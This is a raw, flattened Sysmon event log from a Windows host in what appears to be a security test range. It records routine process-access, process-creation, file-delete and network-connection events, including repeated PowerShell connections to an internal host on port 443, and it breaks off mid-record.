18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.724{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035086008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:09.118{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56785-false10.0.1.12-8000- 23542300x800000000000000035086007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76D93979F7233A1540DEC9FE740C86B3,SHA256=9BFEE937ACF84EBEBF314180F3A175D87E32819B8CFCB08F2290710D2EAE5AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=544DBF79FE12163B0E1D5CB40B67C1A2,SHA256=BF1AECD71CD03AE563256CFEEA56F0C91A8CC0B63DB42BA6ED74041A4CD1057A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.276{B81B27B7-4FC8-613A-7A90-03000000C801}432836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.109{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:45.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76D93979F7233A1540DEC9FE740C86B3,SHA256=9BFEE937ACF84EBEBF314180F3A175D87E32819B8CFCB08F2290710D2EAE5AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:45.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41F21FBBB0F4807C8E0E8DCEE722AC1F,SHA256=A9A1AEDE7D6E23F345BCB627672A40936CBDA4A33DDD5AB97A4E3296C1BBBF96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:09.865{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56786-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:46.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3350D0053FED592BCF227EDBAD248D,SHA256=271EAAE00FA483C583E896BB32A416AACF862A987BC78665202903432C1162D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:47.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=955183B13759E09B967B7E5B583B6795,SHA256=580DEDA41CF5D757195F4D440539078C87025165B8ED42F6A0DBF91A3F24A9CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:48.925{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4532CCFEB0AB3E3A654C833621393A46,SHA256=728A84A5ED2924FEF0C1C3FE89716D4E9684F2F5882E0D70189CB75BDD507701,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:49.958{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959353A377E7CCAE78BA2EC7F8E1D20B,SHA256=55D8E01CA94FC6C98B782CF435C578494AE7A296C3EFCA255CDAA5683FC63B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.235{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56787-false10.0.1.12-8000- 354300x800000000000000035086028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.873{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56788-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:50.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EC65C05B2D7FF2F8F82D79FF09C32692,SHA256=38EA8F883107BB4DC8F75C68D21FA1B15DDFC0F1819941E9609E25D239F78C0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:51.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07FBB7148A79698A1E7F133B4D1398AD,SHA256=EDFBE835F8FA12EC6AA6270D2544570C49284D658B52B362551E0F0A4898913F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:52.038{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDCEB16490B49AF771C694CE7AD3888F,SHA256=A1EFC339D06BC36A35786E0B62ABA5BC0B1159FF81D91D9F50B966641FD8FE6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:53.906{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E435525C33C0D6C331523453139EAA47,SHA256=84DDA71B973CD8FA762EF84DA7B4A3547832E7D1A8FEF3D3D9FC8944102B3187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:53.056{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C079AC86E50CFF7CC2F81FE19393B5B,SHA256=239AE3D1917039979426F2A846D4365A1ABD47BA0CC4DEC3522A17E6AA6FEEFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:18.885{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56789-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:54.973{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:54.090{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D7E08FA57C0BAFEB72C4FF0FAE340A,SHA256=37333848ECA89CFC013BAD28971E78E51E8FF37B70C53A8BD81D38B85052B5FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:55.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA55556832CD6FBBB2AD898AAB12F78,SHA256=963684C3255F3D0E53F0FE40034FE9E38E13B1407A5013820F41494D4E7FABCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a47|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035086042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419b2|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035086041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 